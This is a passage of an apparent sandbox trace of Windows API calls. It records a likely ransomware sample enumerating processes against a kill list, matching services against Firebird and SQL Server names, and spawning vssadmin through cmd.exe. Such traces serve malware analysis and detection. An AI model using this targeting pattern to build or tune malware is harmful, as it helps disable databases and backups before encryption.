lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0051.989] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0051.989] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.990] lstrlenW (lpString="csrss.exe") returned 9 [0051.990] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0051.990] lstrlenW (lpString="winlogon.exe") returned 12 [0051.990] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0051.991] lstrlenW (lpString="services.exe") returned 12 [0051.991] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0051.992] lstrlenW (lpString="lsass.exe") returned 9 [0051.992] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0051.992] lstrlenW (lpString="lsm.exe") returned 7 [0051.992] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.993] lstrlenW (lpString="svchost.exe") returned 11 [0051.993] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.994] lstrlenW (lpString="svchost.exe") returned 11 [0051.994] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.995] lstrlenW (lpString="svchost.exe") returned 11 [0051.995] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.995] lstrlenW (lpString="svchost.exe") returned 11 [0051.995] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.996] lstrlenW (lpString="svchost.exe") returned 11 [0051.996] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0051.997] lstrlenW (lpString="audiodg.exe") returned 11 [0051.997] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.997] lstrlenW (lpString="svchost.exe") returned 11 [0051.997] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.998] lstrlenW (lpString="svchost.exe") returned 11 [0051.998] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0051.999] lstrlenW (lpString="dwm.exe") returned 7 [0051.999] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0052.000] lstrlenW (lpString="explorer.exe") returned 12 [0052.000] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0052.000] lstrlenW (lpString="spoolsv.exe") returned 11 [0052.000] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.001] lstrlenW (lpString="taskhost.exe") returned 12 [0052.001] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.002] lstrlenW (lpString="svchost.exe") returned 11 [0052.002] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0052.002] lstrlenW (lpString="taskeng.exe") returned 11 [0052.002] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.003] lstrlenW (lpString="taskhost.exe") returned 12 [0052.003] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0052.004] lstrlenW (lpString="entrepreneur.exe") returned 16 [0052.004] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0052.113] lstrlenW (lpString="andrew kinds.exe") returned 16 [0052.113] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0052.114] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0052.114] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0052.114] lstrlenW (lpString="educated.exe") returned 12 [0052.114] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0052.115] lstrlenW (lpString="servers.exe") returned 11 [0052.115] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0052.116] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0052.116] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0052.116] lstrlenW (lpString="gbp_chair.exe") returned 13 [0052.117] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0052.117] lstrlenW (lpString="attention infected.exe") returned 22 [0052.117] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0052.118] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0052.118] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0052.119] lstrlenW (lpString="pattern amateur.exe") returned 19 [0052.119] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0052.120] lstrlenW (lpString="referral.exe") returned 12 [0052.120] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0052.120] lstrlenW (lpString="copyingseems.exe") returned 16 [0052.120] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0052.121] lstrlenW (lpString="spin generally.exe") returned 18 [0052.121] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0052.122] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0052.122] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0052.122] lstrlenW (lpString="transmit.exe") returned 12 [0052.122] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0052.123] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0052.123] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0052.124] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0052.124] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0052.124] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0052.124] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0052.125] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0052.125] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0052.126] lstrlenW (lpString="delight.exe") returned 11 [0052.126] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0052.126] lstrlenW (lpString="within enquiry.exe") returned 18 [0052.126] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.127] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0052.127] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0052.128] lstrlenW (lpString="agent1c.exe") returned 11 [0052.128] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.129] lstrlenW (lpString="cmd.exe") returned 7 [0052.129] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.129] lstrlenW (lpString="conhost.exe") returned 11 [0052.129] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0052.130] lstrlenW (lpString="vssadmin.exe") returned 12 [0052.130] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0052.130] lstrlenW (lpString="VSSVC.exe") returned 9 [0052.131] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.131] lstrlenW (lpString="svchost.exe") returned 11 [0052.131] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0052.132] CloseHandle (hObject=0x1a0) returned 1 [0052.132] Sleep (dwMilliseconds=0x1f4) [0052.670] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37203d0 [0052.851] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0052.857] GetLastError () returned 0xea [0052.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x6e39b0 [0052.863] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6e39b0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6e39b0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0052.875] CloseServiceHandle (hSCObject=0x37203d0) returned 1 [0052.879] lstrlenW (lpString="Appinfo") returned 7 [0052.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0052.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0052.880] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0052.881] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0052.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0052.883] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0052.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.887] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0052.888] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0052.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0052.888] lstrlenW (lpString="AudioSrv") returned 8 [0052.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0052.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0052.890] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0052.890] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0052.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0052.892] lstrlenW (lpString="BFE") returned 3 [0052.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0052.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0052.900] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0052.901] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0052.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0052.903] lstrlenW (lpString="CryptSvc") returned 8 [0052.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0052.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0052.904] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0052.905] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0052.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0052.905] lstrlenW (lpString="CscService") returned 10 [0052.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0052.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0052.909] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0052.910] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0052.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0052.911] lstrlenW (lpString="DcomLaunch") returned 10 [0052.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.914] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0052.914] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0052.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0052.916] lstrlenW (lpString="Dhcp") returned 4 [0052.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0052.917] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0052.918] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0052.918] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0052.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0052.921] lstrlenW (lpString="Dnscache") returned 8 [0052.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0052.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0052.923] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0052.924] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0052.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0052.924] lstrlenW (lpString="DPS") returned 3 [0052.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0052.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0052.926] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0052.927] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0052.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0052.930] lstrlenW (lpString="eventlog") returned 8 [0052.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0052.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0052.931] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0052.932] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0052.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0052.932] lstrlenW (lpString="EventSystem") returned 11 [0052.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0052.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0052.934] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0052.935] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0052.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0052.937] lstrlenW (lpString="gpsvc") returned 5 [0052.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0052.938] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0052.939] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0052.940] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0052.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0052.940] lstrlenW (lpString="iphlpsvc") returned 8 [0052.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.942] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0052.942] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0052.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0052.943] lstrlenW (lpString="LanmanServer") returned 12 [0052.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0052.944] lstrcmpiW 